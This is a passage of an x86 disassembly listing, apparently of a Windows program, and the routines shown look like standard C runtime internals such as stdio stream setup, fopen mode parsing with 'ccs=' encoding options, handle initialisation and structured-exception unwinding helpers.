mov eax, [esp+arg_0]
mov ds:dword_425FC4, eax
retn
sub_408058 endp
; =============== S U B R O U T I N E =======================================
sub_408062 proc near ; CODE XREF: sub_40304B+B�p
; sub_4036E0+8C�p ...
arg_0 = dword ptr 4
push ds:dword_425FC4
call sub_405193
test eax, eax
pop ecx
jz short loc_408081
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_408081
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_408081: ; CODE XREF: sub_408062+E�j
; sub_408062+19�j
xor eax, eax
retn
sub_408062 endp
; =============== S U B R O U T I N E =======================================
sub_408084 proc near ; CODE XREF: sub_4067D6+76�p
; sub_4067D6+82�p ...
mov eax, offset off_423950
retn
sub_408084 endp
; =============== S U B R O U T I N E =======================================
sub_40808A proc near ; DATA XREF: J8@F_7_S:0041D2C8�o
mov eax, ds:dword_434DC0
test eax, eax
push esi
push 14h
pop esi
jnz short loc_40809E
mov eax, 200h
jmp short loc_4080A4
; ---------------------------------------------------------------------------
loc_40809E: ; CODE XREF: sub_40808A+B�j
cmp eax, esi
jge short loc_4080A9
mov eax, esi
loc_4080A4: ; CODE XREF: sub_40808A+12�j
mov ds:dword_434DC0, eax
loc_4080A9: ; CODE XREF: sub_40808A+16�j
push 4
push eax
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov ds:dword_433DA0, eax
jnz short loc_4080DA
push 4
push esi
mov ds:dword_434DC0, esi
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov ds:dword_433DA0, eax
jnz short loc_4080DA
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4080DA: ; CODE XREF: sub_40808A+30�j
; sub_40808A+49�j
xor edx, edx
mov ecx, offset off_423950
jmp short loc_4080E8
; ---------------------------------------------------------------------------
loc_4080E3: ; CODE XREF: sub_40808A+6D�j
mov eax, ds:dword_433DA0
loc_4080E8: ; CODE XREF: sub_40808A+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_423BD0
jl short loc_4080E3
push 0FFFFFFFEh
pop esi
xor edx, edx
mov ecx, offset dword_423960
push edi
loc_408104: ; CODE XREF: sub_40808A+AA�j
mov edi, edx
and edi, 1Fh
imul edi, 28h
mov eax, edx
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
mov eax, [edi+eax]
cmp eax, 0FFFFFFFFh
jz short loc_408128
cmp eax, esi
jz short loc_408128
test eax, eax
jnz short loc_40812A
loc_408128: ; CODE XREF: sub_40808A+94�j
; sub_40808A+98�j
mov [ecx], esi
loc_40812A: ; CODE XREF: sub_40808A+9C�j
add ecx, 20h
inc edx
cmp ecx, offset dword_4239C0
jl short loc_408104
pop edi
xor eax, eax
pop esi
retn
sub_40808A endp
; =============== S U B R O U T I N E =======================================
sub_40813B proc near ; DATA XREF: J8@F_7_S:0041D2E4�o
call sub_408D58
cmp ds:byte_425FB0, 0
jz short loc_40814E
call sub_40DFD3
loc_40814E: ; CODE XREF: sub_40813B+C�j
push ds:dword_433DA0
call sub_403603
pop ecx
retn
sub_40813B endp
; =============== S U B R O U T I N E =======================================
sub_40815B proc near ; CODE XREF: sub_403207+4F�p
; sub_4034C4+50�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_423950
cmp eax, ecx
jb short loc_40817F
cmp eax, offset dword_423BB0
ja short loc_40817F
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_4059F7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40817F: ; CODE XREF: sub_40815B+B�j
; sub_40815B+12�j
add eax, 20h
push eax
call ds:dword_41D168
retn
sub_40815B endp
; =============== S U B R O U T I N E =======================================
sub_40818A proc near ; CODE XREF: sub_4084A1+66�p
; sub_408C7E+46�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_40819E
add eax, 10h
push eax
call sub_4059F7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40819E: ; CODE XREF: sub_40818A+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41D168
retn
sub_40818A endp
; =============== S U B R O U T I N E =======================================
sub_4081AD proc near ; CODE XREF: sub_4031EA+3�p
; sub_40334C+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_423950
cmp eax, ecx
jb short loc_4081D1
cmp eax, offset dword_423BB0
ja short loc_4081D1
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_40591F
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4081D1: ; CODE XREF: sub_4081AD+B�j
; sub_4081AD+12�j
add eax, 20h
push eax
call ds:dword_41D16C
retn
sub_4081AD endp
; =============== S U B R O U T I N E =======================================
sub_4081DC proc near ; CODE XREF: sub_4084A1+7D�p
; sub_408D20+9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_4081F0
add eax, 10h
push eax
call sub_40591F
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4081F0: ; CODE XREF: sub_4081DC+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41D16C
retn
sub_4081DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081FF proc near ; CODE XREF: sub_403130+9A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_426484
push ebx
xor ebx, ebx
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
mov [ebp+var_10], ebx
jmp short loc_408220
; ---------------------------------------------------------------------------
loc_40821F: ; CODE XREF: sub_4081FF+24�j
inc esi
loc_408220: ; CODE XREF: sub_4081FF+1E�j
cmp byte ptr [esi], 20h
jz short loc_40821F
mov al, [esi]
cmp al, 61h
jz short loc_408264
cmp al, 72h
jz short loc_40825B
cmp al, 77h
jz short loc_408252
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
jmp loc_40849D
; ---------------------------------------------------------------------------
loc_408252: ; CODE XREF: sub_4081FF+32�j
mov [ebp+arg_4], 301h
jmp short loc_40826B
; ---------------------------------------------------------------------------
loc_40825B: ; CODE XREF: sub_4081FF+2E�j
or [ebp+var_4], 1
mov [ebp+arg_4], ebx
jmp short loc_40826F
; ---------------------------------------------------------------------------
loc_408264: ; CODE XREF: sub_4081FF+2A�j
mov [ebp+arg_4], 109h
loc_40826B: ; CODE XREF: sub_4081FF+5A�j
or [ebp+var_4], 2
loc_40826F: ; CODE XREF: sub_4081FF+63�j
xor ecx, ecx
inc ecx
inc esi
mov al, [esi]
cmp al, bl
push edi
jz loc_408437
mov edx, 80h
mov edi, 4000h
loc_408288: ; CODE XREF: sub_4081FF+1B6�j
cmp ecx, ebx
jz loc_4083BB
movsx eax, al
cmp eax, 53h
jg loc_40833E
jz loc_40832C
sub eax, 20h
jz loc_4083B0
sub eax, 0Bh
jz short loc_408306
dec eax
jz short loc_4082FA
sub eax, 18h
jz short loc_4082E7
sub eax, 0Ah
jz short loc_4082DF
sub eax, 4
jnz loc_408440
cmp [ebp+var_8], ebx
jnz loc_4083A5
or [ebp+arg_4], 10h
mov [ebp+var_8], 1
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082DF: ; CODE XREF: sub_4081FF+BC�j
or [ebp+arg_4], edx
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082E7: ; CODE XREF: sub_4081FF+B7�j
test byte ptr [ebp+arg_4], 40h
jnz loc_4083A5
or [ebp+arg_4], 40h
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082FA: ; CODE XREF: sub_4081FF+B2�j
mov [ebp+var_10], 1
jmp loc_4083A5
; ---------------------------------------------------------------------------
loc_408306: ; CODE XREF: sub_4081FF+AF�j
test byte ptr [ebp+arg_4], 2
jnz loc_4083A5
mov eax, [ebp+arg_4]
and eax, 0FFFFFFFEh
or eax, 2
mov [ebp+arg_4], eax
mov eax, [ebp+var_4]
and eax, 0FFFFFFFCh
or eax, edx
mov [ebp+var_4], eax
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_40832C: ; CODE XREF: sub_4081FF+9D�j
cmp [ebp+var_8], ebx
jnz short loc_4083A5
or [ebp+arg_4], 20h
mov [ebp+var_8], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40833E: ; CODE XREF: sub_4081FF+97�j
sub eax, 54h
jz short loc_40839D
sub eax, 0Eh
jz short loc_40838C
dec eax
jz short loc_40837B
sub eax, 0Bh
jz short loc_408366
sub eax, 6
jnz loc_408440
test word ptr [ebp+arg_4], 0C000h
jnz short loc_4083A5
or [ebp+arg_4], edi
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_408366: ; CODE XREF: sub_4081FF+14F�j
cmp [ebp+var_C], ebx
jnz short loc_4083A5
and [ebp+var_4], 0FFFFBFFFh
mov [ebp+var_C], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40837B: ; CODE XREF: sub_4081FF+14A�j
cmp [ebp+var_C], ebx
jnz short loc_4083A5
or [ebp+var_4], edi
mov [ebp+var_C], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40838C: ; CODE XREF: sub_4081FF+147�j
test word ptr [ebp+arg_4], 0C000h
jnz short loc_4083A5
or [ebp+arg_4], 8000h
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40839D: ; CODE XREF: sub_4081FF+142�j
test word ptr [ebp+arg_4], 1000h
jz short loc_4083A9
loc_4083A5: ; CODE XREF: sub_4081FF+CA�j
; sub_4081FF+EC�j ...
xor ecx, ecx
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_4083A9: ; CODE XREF: sub_4081FF+1A4�j
or [ebp+arg_4], 1000h
loc_4083B0: ; CODE XREF: sub_4081FF+A6�j
; sub_4081FF+DB�j ...
inc esi
mov al, [esi]
cmp al, bl
jnz loc_408288
loc_4083BB: ; CODE XREF: sub_4081FF+8B�j
cmp [ebp+var_10], ebx
jz short loc_408437
jmp short loc_4083C3
; ---------------------------------------------------------------------------
loc_4083C2: ; CODE XREF: sub_4081FF+1C7�j
inc esi
loc_4083C3: ; CODE XREF: sub_4081FF+1C1�j
cmp byte ptr [esi], 20h
jz short loc_4083C2
push 4
push esi
push offset aCcs ; "ccs="
call sub_40EB30
add esp, 0Ch
test eax, eax
jnz short loc_408440
add esi, 4
push offset aUtf8 ; "UTF-8"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_4083FC
add esi, 5
or [ebp+arg_4], 40000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_4083FC: ; CODE XREF: sub_4081FF+1EF�j
push offset aUtf16le ; "UTF-16LE"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_408419
add esi, 8
or [ebp+arg_4], 20000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_408419: ; CODE XREF: sub_4081FF+20C�j
push offset aUnicode ; "UNICODE"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_408440
add esi, 7
or [ebp+arg_4], 10000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_408436: ; CODE XREF: sub_4081FF+23B�j
inc esi
loc_408437: ; CODE XREF: sub_4081FF+79�j
; sub_4081FF+1BF�j ...
cmp byte ptr [esi], 20h
jz short loc_408436
cmp [esi], bl
jz short loc_40845A
loc_408440: ; CODE XREF: sub_4081FF+C1�j
; sub_4081FF+154�j ...
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp short loc_408478
; ---------------------------------------------------------------------------
loc_40845A: ; CODE XREF: sub_4081FF+23F�j
push 180h
push [ebp+arg_8]
lea eax, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call sub_40E77C
add esp, 14h
test eax, eax
jz short loc_40847C
loc_408478: ; CODE XREF: sub_4081FF+259�j
xor eax, eax
jmp short loc_40849C
; ---------------------------------------------------------------------------
loc_40847C: ; CODE XREF: sub_4081FF+277�j
mov eax, [ebp+arg_C]
inc ds:dword_425FC8
mov ecx, [ebp+var_4]
mov [eax+0Ch], ecx
mov ecx, [ebp+var_10]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_40849C: ; CODE XREF: sub_4081FF+27B�j
pop edi
loc_40849D: ; CODE XREF: sub_4081FF+4E�j
pop esi
pop ebx
leave
retn
sub_4081FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4084A1 proc near ; CODE XREF: sub_403130+54�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_421538
call __SEH_prolog4
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_4084C1: ; CODE XREF: sub_4084A1+85�j
mov [ebp+var_20], esi
cmp esi, ds:dword_434DC0
jge loc_408591
mov eax, ds:dword_433DA0
lea eax, [eax+esi*4]
cmp [eax], ebx
jz short loc_40852C
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jnz short loc_408525
lea eax, [esi-3]
cmp eax, 10h
ja short loc_4084FE
lea eax, [esi+10h]
push eax
call sub_405934
pop ecx
test eax, eax
jz loc_408591
loc_4084FE: ; CODE XREF: sub_4084A1+49�j
mov eax, ds:dword_433DA0
push dword ptr [eax+esi*4]
push esi
call sub_40818A
pop ecx
pop ecx
mov eax, ds:dword_433DA0
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_408528
push eax
push esi
call sub_4081DC
pop ecx
pop ecx
loc_408525: ; CODE XREF: sub_4084A1+41�j
inc esi
jmp short loc_4084C1
; ---------------------------------------------------------------------------
loc_408528: ; CODE XREF: sub_4084A1+79�j
mov edi, eax
jmp short loc_40858E
; ---------------------------------------------------------------------------
loc_40852C: ; CODE XREF: sub_4084A1+39�j
shl esi, 2
push 38h
call sub_40773A
pop ecx
mov ecx, ds:dword_433DA0
mov [esi+ecx], eax
mov eax, ds:dword_433DA0
add eax, esi
cmp [eax], ebx
jz short loc_408591
push 0FA0h
mov eax, [eax]
add eax, 20h
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
mov eax, ds:dword_433DA0
jnz short loc_408579
push dword ptr [esi+eax]
call sub_403603
pop ecx
mov eax, ds:dword_433DA0
mov [esi+eax], ebx
jmp short loc_408591
; ---------------------------------------------------------------------------
loc_408579: ; CODE XREF: sub_4084A1+C3�j
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41D168
mov eax, ds:dword_433DA0
mov edi, [esi+eax]
loc_40858E: ; CODE XREF: sub_4084A1+89�j
mov [ebp+var_1C], edi
loc_408591: ; CODE XREF: sub_4084A1+29�j
; sub_4084A1+57�j ...
cmp edi, ebx
jz short loc_4085A7
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_4085A7: ; CODE XREF: sub_4084A1+F2�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4085BE
mov eax, edi
call __SEH_epilog4
retn
sub_4084A1 endp
; =============== S U B R O U T I N E =======================================
sub_4085BB proc near ; DATA XREF: J8@F_7_S:00421550�o
mov edi, [ebp-1Ch]
sub_4085BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4085BE proc near ; CODE XREF: sub_4084A1+10D�p
push 1
call sub_40591F
pop ecx
retn
sub_4085BE endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4085C8 proc near ; CODE XREF: sub_403130+8A�p
; sub_4085C8+BD�p ...
var_20 = dword ptr -20h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
mov edx, [esp+0Ch+arg_0]
mov eax, [esp+0Ch+arg_4]
mov ecx, [esp+0Ch+arg_8]
push ebp
push edx
push eax
push ecx
push ecx
push offset loc_408658
push large dword ptr fs:0
mov eax, ds:dword_423064
xor eax, esp
mov [esp+28h+var_20], eax
mov large fs:0, esp
loc_4085FA: ; CODE XREF: sub_4085C8+64�j
; sub_4085C8+80�j
mov eax, [esp+28h+arg_4]
mov ebx, [eax+8]
mov ecx, [esp+28h+arg_0]
xor ebx, [ecx]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFEh
jz short loc_40864A
mov edx, [esp+28h+arg_8]
cmp edx, 0FFFFFFFEh
jz short loc_40861C
cmp esi, edx
jbe short loc_40864A
loc_40861C: ; CODE XREF: sub_4085C8+4E�j
lea esi, [esi+esi*2]
lea ebx, [ebx+esi*4+10h]
mov ecx, [ebx]
mov [eax+0Ch], ecx
cmp dword ptr [ebx+4], 0
jnz short loc_4085FA
push 101h
mov eax, [ebx+8]
call sub_40EC5D
mov ecx, 1
mov eax, [ebx+8]
call sub_40EC7C
jmp short loc_4085FA
; ---------------------------------------------------------------------------
loc_40864A: ; CODE XREF: sub_4085C8+45�j
; sub_4085C8+52�j
pop large dword ptr fs:0
add esp, 18h
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_408658: ; DATA XREF: sub_4085C8+14�o
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40869D
mov eax, [esp+arg_4]
mov ecx, [eax+8]
xor ecx, eax
call sub_402710
push ebp
mov ebp, [eax+18h]
push dword ptr [eax+0Ch]
push dword ptr [eax+10h]
push dword ptr [eax+14h]
call sub_4085C8
add esp, 0Ch
pop ebp
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40869D: ; CODE XREF: sub_4085C8+A0�j
retn
sub_4085C8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
push dword ptr [ecx+1Ch]
push dword ptr [ecx+18h]
push dword ptr [ecx+28h]
call sub_4085C8
add esp, 0Ch
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_4086BA proc near ; CODE XREF: sub_406640+89�p
push ebp
push esi
push edi
push ebx
mov ebp, edx
xor eax, eax
xor ebx, ebx
xor edx, edx
xor esi, esi
xor edi, edi
call ecx
pop ebx
pop edi
pop esi
pop ebp
retn
sub_4086BA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_406640
loc_4086D1: ; CODE XREF: sub_406640+170�j
mov ebp, edx
mov esi, ecx
mov eax, ecx
push 1
call sub_40EC5D
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor edi, edi
jmp esi
; END OF FUNCTION CHUNK FOR sub_406640
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4086EA proc near ; CODE XREF: sub_406640+11F�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0
push 0
push offset loc_4086FF
push ecx
call sub_413976
loc_4086FF: ; DATA XREF: sub_4086EA+A�o
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4086EA endp
; =============== S U B R O U T I N E =======================================
sub_408704 proc near ; CODE XREF: sub_406640+137�p
; sub_406640+18C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
mov ebp, [esp+4+arg_0]
push edx
push ecx
push [esp+0Ch+arg_4]
call sub_4085C8
add esp, 0Ch
pop ebp
retn 8
sub_408704 endp
; =============== S U B R O U T I N E =======================================
sub_40871B proc near ; CODE XREF: sub_403207+10E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_408A20
push eax
call sub_40D540
test eax, eax
pop ecx
pop ecx
jz short loc_4087AD
call sub_408084
add eax, 20h
cmp esi, eax
jnz short loc_408742
xor eax, eax
jmp short loc_408751
; ---------------------------------------------------------------------------
loc_408742: ; CODE XREF: sub_40871B+21�j
call sub_408084
add eax, 40h
cmp esi, eax
jnz short loc_4087AD
xor eax, eax
inc eax
loc_408751: ; CODE XREF: sub_40871B+25�j
inc ds:dword_425FC8
test word ptr [esi+0Ch], 10Ch
jnz short loc_4087AD
push ebx
push edi
lea edi, ds:425FCCh[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_408792
push ebx
call sub_40773A
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_408792
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_40879F
; ---------------------------------------------------------------------------
loc_408792: ; CODE XREF: sub_40871B+55�j
; sub_40871B+62�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_40879F: ; CODE XREF: sub_40871B+75�j
or dword ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4087AD: ; CODE XREF: sub_40871B+15�j
; sub_40871B+31�j ...
xor eax, eax
pop esi
retn
sub_40871B endp
; =============== S U B R O U T I N E =======================================
sub_4087B1 proc near ; CODE XREF: sub_403207+128�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_4087DF
push esi
mov esi, [esp+4+arg_4]
test word ptr [esi+0Ch], 1000h
jz short loc_4087DE
push esi
call sub_408BDA
and dword ptr [esi+0Ch], 0FFFFEEFFh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_4087DE: ; CODE XREF: sub_4087B1+12�j
pop esi
locret_4087DF: ; CODE XREF: sub_4087B1+5�j
retn
sub_4087B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087E0 proc near ; CODE XREF: J8@F_7_S:00404034�p
var_64 = byte ptr -64h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 54h
push offset dword_421558
call __SEH_prolog4
xor edi, edi
mov [ebp+ms_exc.disabled], edi
lea eax, [ebp+var_64]
push eax
call ds:dword_41D1A8
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
push 28h
push 20h
pop esi
push esi
call sub_40777A
pop ecx
pop ecx
cmp eax, edi
jz loc_408A17
mov ds:dword_433CA0, eax
mov ds:dword_433C84, esi
lea ecx, [eax+500h]
jmp short loc_408853
; ---------------------------------------------------------------------------
loc_40882A: ; CODE XREF: sub_4087E0+75�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov [eax+8], edi
mov byte ptr [eax+24h], 0
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 28h
mov ecx, ds:dword_433CA0
add ecx, 500h
loc_408853: ; CODE XREF: sub_4087E0+48�j
cmp eax, ecx
jb short loc_40882A
cmp [ebp+var_32], di
jz loc_40895E
mov eax, [ebp+var_30]
cmp eax, edi
jz loc_40895E
mov edi, [eax]
lea ebx, [eax+4]
lea eax, [ebx+edi]
mov [ebp+var_1C], eax
mov eax, 800h
cmp edi, eax
jl short loc_408882
mov edi, eax
loc_408882: ; CODE XREF: sub_4087E0+9E�j
xor esi, esi
inc esi
jmp short loc_4088D9
; ---------------------------------------------------------------------------
loc_408887: ; CODE XREF: sub_4087E0+FF�j
push 28h
push 20h
call sub_40777A
pop ecx
pop ecx
test eax, eax
jz short loc_4088E3
lea ecx, ds:433CA0h[esi*4]
mov [ecx], eax
add ds:dword_433C84, 20h
lea edx, [eax+500h]
jmp short loc_4088D4
; ---------------------------------------------------------------------------
loc_4088AE: ; CODE XREF: sub_4087E0+F6�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
and byte ptr [eax+24h], 80h
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 28h
mov edx, [ecx]
add edx, 500h
loc_4088D4: ; CODE XREF: sub_4087E0+CC�j
cmp eax, edx
jb short loc_4088AE
inc esi
loc_4088D9: ; CODE XREF: sub_4087E0+A5�j
cmp ds:dword_433C84, edi
jl short loc_408887
jmp short loc_4088E9
; ---------------------------------------------------------------------------
loc_4088E3: ; CODE XREF: sub_4087E0+B4�j
mov edi, ds:dword_433C84
loc_4088E9: ; CODE XREF: sub_4087E0+101�j
and [ebp+var_20], 0
test edi, edi
jle short loc_40895E
loc_4088F1: ; CODE XREF: sub_4087E0+17C�j
mov eax, [ebp+var_1C]
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_408951
cmp ecx, 0FFFFFFFEh
jz short loc_408951
mov al, [ebx]
test al, 1
jz short loc_408951
test al, 8
jnz short loc_408915
push ecx
call ds:dword_41D148
test eax, eax
jz short loc_408951
loc_408915: ; CODE XREF: sub_4087E0+128�j
mov esi, [ebp+var_20]
mov eax, esi
sar eax, 5
and esi, 1Fh
imul esi, 28h
add esi, ds:dword_433CA0[eax*4]
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [esi], eax
mov al, [ebx]
mov [esi+4], al
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jz loc_408A17
inc dword ptr [esi+8]
loc_408951: ; CODE XREF: sub_4087E0+119�j
; sub_4087E0+11E�j ...
inc [ebp+var_20]
inc ebx
add [ebp+var_1C], 4
cmp [ebp+var_20], edi
jl short loc_4088F1
loc_40895E: ; CODE XREF: sub_4087E0+7B�j
; sub_4087E0+86�j ...
xor ebx, ebx
loc_408960: ; CODE XREF: sub_4087E0+213�j
mov esi, ebx
imul esi, 28h
add esi, ds:dword_433CA0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_40897D
cmp eax, 0FFFFFFFEh
jz short loc_40897D
or byte ptr [esi+4], 80h
jmp short loc_4089EF
; ---------------------------------------------------------------------------
loc_40897D: ; CODE XREF: sub_4087E0+190�j
; sub_4087E0+195�j
mov byte ptr [esi+4], 81h
test ebx, ebx
jnz short loc_40898A
push 0FFFFFFF6h
pop eax
jmp short loc_408994
; ---------------------------------------------------------------------------
loc_40898A: ; CODE XREF: sub_4087E0+1A3�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_408994: ; CODE XREF: sub_4087E0+1A8�j
push eax
call ds:dword_41D14C
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4089E5
test edi, edi
jz short loc_4089E5
push edi
call ds:dword_41D148
test eax, eax
jz short loc_4089E5
mov [esi], edi
and eax, 0FFh
cmp eax, 2
jnz short loc_4089C3
or byte ptr [esi+4], 40h
jmp short loc_4089CC
; ---------------------------------------------------------------------------
loc_4089C3: ; CODE XREF: sub_4087E0+1DB�j
cmp eax, 3
jnz short loc_4089CC
or byte ptr [esi+4], 8
loc_4089CC: ; CODE XREF: sub_4087E0+1E1�j
; sub_4087E0+1E6�j
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jz short loc_408A17
inc dword ptr [esi+8]
jmp short loc_4089EF
; ---------------------------------------------------------------------------
loc_4089E5: ; CODE XREF: sub_4087E0+1C0�j
; sub_4087E0+1C4�j ...
or byte ptr [esi+4], 40h
mov dword ptr [esi], 0FFFFFFFEh
loc_4089EF: ; CODE XREF: sub_4087E0+19B�j
; sub_4087E0+203�j
inc ebx
cmp ebx, 3
jl loc_408960
push ds:dword_433C84
call ds:dword_41D150
xor eax, eax
jmp short loc_408A1A
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_408A17: ; CODE XREF: sub_4087E0+31�j
; sub_4087E0+168�j ...
or eax, 0FFFFFFFFh
loc_408A1A: ; CODE XREF: sub_4087E0+227�j
call __SEH_epilog4
retn
sub_4087E0 endp
; =============== S U B R O U T I N E =======================================
sub_408A20 proc near ; CODE XREF: sub_403207+63�p
; sub_403207+6F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_408A48
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_408A48: ; CODE XREF: sub_408A20+9�j
mov eax, [eax+10h]
pop esi
retn
sub_408A20 endp
; =============== S U B R O U T I N E =======================================
sub_408A4D proc near ; CODE XREF: sub_408AE1+94�p
; sub_40E072+340�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_40ED7D
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408AAC
cmp esi, 1
mov eax, ds:dword_433CA0
jnz short loc_408A6F
test byte ptr [eax+54h], 1
jnz short loc_408A7A
loc_408A6F: ; CODE XREF: sub_408A4D+1A�j
cmp esi, 2
